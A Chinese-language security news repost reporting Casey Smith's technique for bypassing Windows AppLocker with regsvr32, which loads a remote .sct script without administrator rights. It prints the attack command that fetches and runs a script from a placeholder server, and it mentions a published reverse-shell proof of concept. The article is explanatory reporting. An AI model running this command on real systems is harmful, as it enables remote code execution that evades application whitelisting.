神刀安全网

Windows AppLocker被绕过:攻击者可不提权联网注入DLL

AppLocker是Windows 7和Windows Server 2008 R2中引入的一项安全功能,旨在帮助管理员们指定哪个用户或用户组能够访问/运行某一个文件。 然而据外媒报道,已经有人找到了利用Windows系统中Regsvr32命令行工具的某个隐藏特性,来绕过Windows AppLocker安全措施并正常注册动态链接库(DLLs)的方法。

Windows AppLocker被绕过:攻击者可不提权联网注入DLL

Regsvr32则是一款可被安装工具(或批处理脚本)使用,以便快速注册动态链接库的脚本工具。

照理说, 微软 既然把这款“中性”而又危险的工具留在系统中,就应该管好它不被管理员之外的人所滥用。但遗憾的是,我们几乎不可能检测到这种类型的攻击。

据安全研究人员Casey Smith所述,当攻击者在某台受感染的工作站上立足之后,就可以滥用Regsvr32、通过网络下载一个COM脚本程序(.sct文件),然后在本地机器上注册一个DLL。

更糟糕的是,攻击者甚至无需取得管理员权限。Regsvr32可借助代理和TLS连接、重定向等功能,并且它拥有微软自家的证书,所以可以执行任何看似正常的背景活动命令。

下面是标准的Regsvr32参数、以及而已命令的对比:

▪ regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

▪ regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Smith还指出,“regsvr32能够接收的脚本网址没有很好的记录,要触发这一‘旁路’,可以把内置VB和JS元素的代码块放进去”。

在进一步的测试中,研究人员还在GitHub上放出了系统管理员能够下载的“ 概念验证脚本 ”(通过Regsvr32并打开一个后门、或者基于HTTP的反向shell)。

从理论上来说,这种类型的“漏洞”允许攻击者访问注册所有DLL,然后在被感染的计算机上执行恶意代码,更别说管理员权限了。

[编译自: Soft Pedia ]

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » Windows AppLocker被绕过:攻击者可不提权联网注入DLL

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址